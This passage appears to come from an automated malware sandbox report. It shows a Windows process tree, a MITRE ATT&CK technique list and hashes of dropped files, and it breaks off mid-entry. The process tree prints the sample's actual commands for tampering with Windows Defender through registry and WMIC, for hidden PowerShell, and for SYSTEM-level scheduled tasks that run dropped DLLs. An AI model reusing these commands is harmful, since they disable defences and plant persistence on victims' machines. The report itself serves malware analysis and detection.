    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5136
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:1088
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5896
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4120
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5192
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1036
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5008
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5904
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5644
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5000
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5736
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4224
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2332
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:3964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4212
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:4956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:5348
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4388
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:1716
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:5684
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:4748
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6100
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\LCxSic.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:3252
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\xlhLnfp.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5580
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:4648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\FlzFRvO.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5068
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:644
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\VgUqqOX.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:392
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5056
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\NsvEbOL.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4004
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\ekgfRDz.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6040
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5588
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 11:06:18 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\zOVpqAXs\wchihNA.dll\",#1 /vtdideWoK 385118" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:1720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:5240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:2448
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5904

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3028

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\zOVpqAXs\wchihNA.dll",#1 /vtdideWoK 385118
1⤵
PID:5424
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\zOVpqAXs\wchihNA.dll",#1 /vtdideWoK 385118
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Drops file in System32 directory
  - Enumerates system info in registry
  PID:5020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
    3⤵
    PID:5880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
b8178becac9b6a3c205a325ea5f51bf4

SHA1
fe6c9ab291e9d9878af6cc01b685fc02135f70d4

SHA256
cee14b916a22a1bdad951fb42ea276d59c86ed0aa67ad42af912b5f268023d63

SHA512
572a467659f14a2b161c30c82d899dea8abe01201a2e9a87d8f675652e0b037a1123c46ee972a2ae6c7b07558db140ecf06a145dfefa5b77756da897c468d40a

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
4a862aa0d593831bc6d35c7bd2166020

SHA1
91f14d107264052f44419e08fa37a1d409282977

SHA256
89f014dcc0b5af8bd6bd9ebb69ca663d21053093be8d762955d18c7937292707

SHA512
654f9941852005514beda1db193c8ab0d32b67a75583df02fe8fba08db124ac6465434f41b498f5bc233214c4ffaf94ec544403ce56162538e23e8e342827526

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
5f4d067028905d886619deda52b25a69

SHA1
b36b6c5e3d1149cc9c223da3a2ae02f073019682

SHA256
8aa4d2731cb371adb08face45f3bb7703dee2992eb48a521ed3aad3e7a4cb3e6

SHA512
a43eb2a077a5962b221f4bf4c42b702bf0642771caa457e129d482b2f0cc924e479a52fbb5f182f15725818d0882f37196fb2ca9bb9251cb321144fa48af08c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
31KB

MD5
b51e27ddae3bccd9d5244fb04ceea631

SHA1
e75fba4ca64d01dcb509b51946319264ff977379

SHA256
d743849478a900d2a8f4a83eceddddd945061d245caedfa7353fd9c8002b27b9

SHA512
0973d39b275eae83603edf35d7f98a1b1794fa1d4de343748d23053b642dbeae757124ceb0bedf36f840910c3ee4ae5803a180461fc1c69c18384e588e21cab2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
31KB

MD5
4c68d9485210f2c4d19dcd4a6a79a6cf

SHA1
b9b92ad6b922079c33f0a048b59d8f05e82195ec

SHA256
de001b54c073618c2c2a4e81ce41be03d1afa06e0b4adff9dfb710d52875cf13

SHA512
d118d0e90525d8162049bad820fd555b447eeb5faa1d79ac497c74270e325738fe0e4b94d67f51ae6edbaa0629e8b02575bb76606cf69157cf20c30492ffbb89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
4d3079204457471b40e6c4be6ed084ec

SHA1
b89e438b5fcf66486d76df98cf7f33067a6c97fd

SHA256
3975663fe7db1404ae9dbc3e47668eafb632188d8ad8041a68af55c84dfb4b8f

SHA512
a35c86c1adf4b53b7e3ea180f72843461e7f74664df5a8a6a73ecdffaed949f6a4def571f78ce6e651149984720a6b022629b7cb49ec7620801093727f2eb80f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
5e980416217cff916573c541cf2dd633

SHA1
f0f90c338a9975d99317dbf3270138ed114d529d

SHA256
49aef2b2e5e7ea33abfc99efa1279fb578d51c9596ac073b9059b8f41d43330f

SHA512
48d4fe31458d3f4c3d483e1d1798a5460b861e168ae69519b6ae0ba7cd9b1deee212e7fb1bba3ae0a64d6f0e14082dd1d662128c856e38a203d2dc79eb9669ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
f723d7e64e7eee78ddf336de25185e06

SHA1
8a4805a793950fd01a2954e38c686c68e6222a12

SHA256
9ab8a96ad7689cfca844df62eaee0ede74ed0ffc040c1d3fdfbcd5c3a8ec69df

SHA512
b58e03049ea8e189b040fd1c26eae849cffee0f45e17234b6f047dd110de147513289261f1154b50afd67c6ec973cc239a2048bcc1b3a1aa0d31154d4eeaf834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6bf6f1381774e9a5fb50b4ff461acd2f

SHA1
4f0f8969c1ed6763c902706556ba5f2edb55c1fb

SHA256
f6a2d2d403e3263863be578410274191d6ceefd5f078ab5a3ff1760d0d32a5b2

SHA512
1f9bc916167fce8f83d3bf75fe51b4fe29b0b5eb812373d11f1bfe6d0a56ff635dd66a88a25df6b3e6c83fff43dadf04fa3a09c16ceed0ca68cfb170c352059e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
1b8843bb2e29b88e772ece86c929a5f9

SHA1
cbd0be449ff92b92a0acfa3a1d38f05cf66b3fb4

SHA256
6ea4d3cc5ee37eab85dd713c78721fcd291883bfc280a5ce399c689186655823

SHA512
38c7cce0dd61d813c2dffbe1c6ce69a998af4fee9d073153f1296d9d37d22b2b15a9d75b9a444975208e78afe35a2f700370c03b07361492185467d9550a8871

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
99aeb5e67f65dbc621bec526ef911756

SHA1
4ec359b79373d2c105e78bd6ad3b735827b7f6e6

SHA256
e10407ebb31c06282324b994c4bf8fd49af88e0098a2c3077ab41eca8a338c54

SHA512
b920b89c2bf8200777d1c9f1cc8add3e714ca89a2630e7b681555837e39842ba1dca422851c35e0bb057d7a7aea358d3c5e078fc2b92c886d7ea670f0f355288

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
9a18dea2dcf3b7bbf8c34eeab8a10961

SHA1
0d475cda33fe51f61c09bbf9e011845ce1d23f3e

SHA256
ebb9c9ef932ab42c0bb119fe7b900759faebd6389c983443dea2cb745f8a9874

SHA512
6f06ab705146423d65919cb984a7fec054e188919148d5d6964a817d587b3dbe5bafba5e0db74d7d8487ad1484d495991d96b30256fafbd1df5be96c6b01b1aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6D0D.tmp\Install.exe

Filesize
3.6MB

MD5
3fff2c7c58095415b71ee343a7aff3ca

SHA1
4acdf0c78a5c433bfd70a9facfe7dd665c1be0ee

SHA256
32270ecaf6cd3c3a9e12ba9f684b0a10c0cebf22e9fa19f1c6597c2577666c1e

SHA512
2a0f40e171df39b391afa3bb4e05237d4cec1aac41ea032d8a839d82b83ff65dd0f04d5e46239e5d06ff428a11aeb2405ccdcd6f54ce7f8735f92dadf1bba2d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6D0D.tmp\Install.exe

Filesize
6.3MB

MD5
59da4f5d42d92baa152e792c81ec7e9b

SHA1
77bf499a463e2a9e4332850aab9e465659464b77

SHA256
340e8cd6f5d2afc32a9ae7eeda8bd61ec3c74af55ab03a96c2704517334595a8

SHA512
d4161367e2b5102b9d3c8ed47a1532ded4afc2822759abf21ffaea1c22f7fcc2c9a8c9599eba54822dfc7fdb20949fd2ceaabd8a42f97ca4c1da46fa4db4bb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\CastSrv.exe

Filesize
90KB

MD5
926a9def76ad857825c435eaabd4a686

SHA1
b96e9857cba9fbca67d6cb9449b2218df4488517

SHA256
77a1f38aa476f33cf8295028c24d846caa6445efd8cfca9ca85cb020085b64c3

SHA512
e53f6d5ea7fd748615f8619abb3c77f635e4f7ad52873db19449e25407300cbd660533f2b2396a759c899f2f56e45f0686c4fcd430b580979cbb3a04547dd83b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\Info.xml

Filesize
3KB

MD5
0456be6047774e5d0b8045b787048924

SHA1
76f6445368a4462a50e502bc272a8efc2eb33cb0

SHA256
1c4440a8312e16bc682277164cc6710b37fc3dcac5ef9aa0ba7e77fc0c1f4897

SHA512
c0f0cf97e0fd0b258b9a9fa6466dd9e390cd79f3edb0f5b9f10137c241c6b079061135c44c0c30dc71c28f1b7b929c65eb1112761e53cd8400d7e07ce1a7b99c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\Install.exe

Filesize
5.9MB

MD5
7801070a837b3c37edb1ec6555e270d3

SHA1
3738118de7a93134c2fbc01a0f0d3e73fd757d01

SHA256
2ecd5030e4d1a66055ffca71920c589d5fa11f455b8fe31968ee8313a96d4aa1

SHA512
992576f5c6d5df361575381605b12784a8f6f02f500ef5d2878c0462de50196efa1ccd6602e6ceb2b7af4933c889fa4e81d76903132ea730fe766a65dcd2d2ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\Install.exe

Filesize
6.4MB

MD5
49403cac85e726e4c74cdc933f6e1d42

SHA1
c3b111cc5d76117447e773b05ffc49b550a9a902

SHA256
7ccd72435454236c6f1f846caf7eee558b6dafd43abf9bfdffcd7dda2f04c485

SHA512
53f7e5a637d7f75411d45cac96d652a18d9325b961ba8b4281b82bb38bc367c542597f8c5a223f0b38201405a3fe0dc862e8ed9699c8154d016fd3af85eb2b55

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tajgpodp.krc.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\u3wc.0.exe

Filesize
282KB

MD5
f72e01dfb65e6409cb0fc611e466e9d5

SHA1
e3d9f9d5e531ea1537bbecbf8064c5772a3c4a26

SHA256
7eec5c68ccc964cae08684c73b65a0427623454286b253b4ee4453dc1aa93bbf

SHA512
7f47b5e7d997d923ca3d2a481bd8754b01c444c3be284b01e8577e58632bf1b69db87927e57079999e9ffc4dc1d50c45b68a5ce3b4ad58bdcf55d48acb9a87c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\u3wc.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Local\vwffHxtupcuKr0efzpBxf4rV.exe

Filesize
4.2MB

MD5
d42f70bc211153abcc56b7b550d8f066

SHA1
2e79143fa90a058e56dad12920f2d450cc138098

SHA256
f1ad483fb40354a1d2c9f1b8ed46ae799fc67433af0a6ff0393c59939f752d4f

SHA512
c10085de5476de153204a08c7e66245fa729922f118f6a2567ec547097effe710c31d0f626aedae4af1a971e3594fd7cf2544d353168f931ed4ab9dc99f12c79

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js

Filesize
7KB

MD5
ecef87283c09b83814b3a9da67583b63

SHA1
7b59879f79d5cf8cfd96237d9a7c62c3a8087943

SHA256
1ba7330e2fb1c4f46574e2727dff24e10debd800d0b370adbd9e450be2750f50

SHA512
e24d618789e7b8c52da56ff68ae2477ab0b87f507428d62291701661e8b91f6deb3b168c4624f23c253c155d6b30485f6a80743deb5077767b9ad0f1d605651d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\searchplugins\cdnsearch.xml

Filesize
1KB

MD5
2869f887319d49175ff94ec01e707508

SHA1
e9504ad5c1bcf31a2842ca2281fe993d220af4b8

SHA256
49dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15

SHA512
63673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b

Download Submit
C:\Users\Admin\Pictures\1PuMPEzZvab5azK7IQYu0T4l.exe

Filesize
3.6MB

MD5
f4a484f556dfd0b48f1ba3873baf2870

SHA1
b1c705467111e5912672cd7d2d3f8ed95066260f

SHA256
f5e372cdda50fbab3277ce0ebfec2e492f8987a3bc9022c13dbc7e9097b1329a

SHA512
2f530cb71e4098bcb4154921257bf2f9c6576f09a760fdbfa2990b0cbc09df43244dc047bea51c75ab4df8287862366d69c881580f4ea89283caee6f2cef77f5

Download Submit
C:\Users\Admin\Pictures\1PuMPEzZvab5azK7IQYu0T4l.exe

Filesize
2.0MB

MD5
94446120d236003fb066ee21604fea4b

SHA1
d6b4674521636e5ea10233e6abe25d94cca28c84

SHA256
89f9a3b229bc2d42620676ffedbcd22e299b9a5c9608a8cd01768c0220670acd

SHA512
0bea7d471ebeba276f7f223b125c0d44dd7d291fa51ef8a14aa16592142a50d210923d10ba11574b9a5ad263520fddb9ef8f7f5aa1278e0b4c93b05e6a0785a0

Download Submit
C:\Users\Admin\Pictures\7MM744ZzhbjMl2SlsY8JpIyY.exe

Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\Pictures\KILAV28QqdA8TFWpDnxeBfib.exe

Filesize
4.2MB

MD5
61ea29403f696bdb529abfed16a6cef4

SHA1
57aaf7b5fa7765bc42a4391a640502d30b6432b1

SHA256
944c792b16309c7461018d999d0831a2d299b19f81015da489d77d1445ac24da

SHA512
04eb6d2e7944a80ead6eb58a019aef33900c142e7cfd156c215d94f879d5d1586ce451aa40dc5e8f0b9d78a503be967301e89dfc65f85e639e1dc94cfa021004

Download Submit
C:\Users\Admin\Pictures\XTz0VIeuIV1rlz8hoaYk7Ojd.exe

Filesize
423KB

MD5
7e082a8f4b814df02d2492b92ba08679

SHA1
ebc6c49b269bcf96a64f198353efbc26564e0103

SHA256
788b07ddb4703999ebce7d1ea6de760f99667a6d2f3e905932c913d689c83ae2

SHA512
